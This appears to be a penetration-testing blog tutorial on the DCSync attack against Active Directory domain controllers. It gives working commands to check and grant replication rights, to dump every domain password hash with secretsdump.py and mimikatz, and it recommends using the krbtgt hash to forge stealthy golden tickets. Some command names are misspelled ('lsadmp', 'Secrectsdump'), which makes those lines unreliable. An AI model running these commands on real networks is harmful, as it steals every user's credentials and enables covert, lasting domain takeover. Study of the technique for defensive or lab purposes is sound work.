Home DCSync Attack

DCSync Attack

DCSync is a well-known technique allowing an attacker to extract password hash from the domain controller by simulating the behaviour of domain replication.Impersonating as an Domain Controller

To perform this attack, you must have control over an account that has the rights to perform domain replication (a user with the Replicating Directory Changes and Replicating Directory Changes All permissions set). Usually, only domain controllers, domain administrators, and enterprise administrators have the privileges required to perform DCSync.

Lab Setup

Below are the key permissions that could perform DCSync attack:

  • Replicating Directory Changes
  • Replicating Directory Changes All
  • Replicating Directory Changes In Filtered Set
Checking DCSync rights
PS C:\Cryptex> Get-DomainObjectAcl -SearchBase "DC=crt,DC=local" -SearchScope Base -ResolveGUIDs | ?{($_.ObjectAceType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "tstark"}

Image title

if the output appears to be blank that means the user doesnt have the required key permissions that could perform DCSync attack

If we had certain rights over the user (such as WriteDacl), we could also add this privilege to a user under our control, execute the DCSync

Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity username -Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose

How Does the attack work?

The DCSync command in Mimikatz allows an attacker to pretend to be a domain controller and retrieve password hashes from other domain controllers, without executing any code on the target. DCSync leverages Directory Replication Service Remote Protocol (MS-DRSR), which is an RPC protocol for replication and management of data in Active Directory.

Extracting Hash

Using Secrectsdump.py

Download Secrectsdump.py

python3 secrectsdump.py <domain-name>/user:pass@domain-ip

This will dump the entire domain in csv format which will output username, RID and NT hash

Image title

### "-just-dc-ntlm" flag if we only want NTLM hashes
secretsdump.py -outputfile domain_hashes -just-dc-ntlm domain/user@ip
### "-just-dc-user <USERNAME>" to only extract data for a specific user
secretsdump.py -outputfile domain_hashes -just-dc-user <username>

Using Mimikatz

Download mimikatz

 lsadmp::dcsync /all /csv 

Image title

You can also specify domain name

 lsadmp::dcsync /all /csv /domain:crt.local

Image title

Further procedure

Well, you could use the Administrator NT Hash but that would not be very stealthy, instead you could use krbtgt’s NT Hash to create a golden ticket which is much more stealthier.

This post is licensed under CC BY 4.0 by the author.